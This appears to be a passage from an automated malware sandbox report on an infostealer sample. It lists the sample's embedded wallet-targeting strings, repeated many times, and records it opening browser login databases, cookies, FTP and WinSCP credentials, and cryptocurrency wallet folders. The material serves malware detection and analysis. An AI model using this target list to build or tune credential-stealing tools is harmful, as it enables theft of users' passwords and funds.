Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonM`
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.r

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
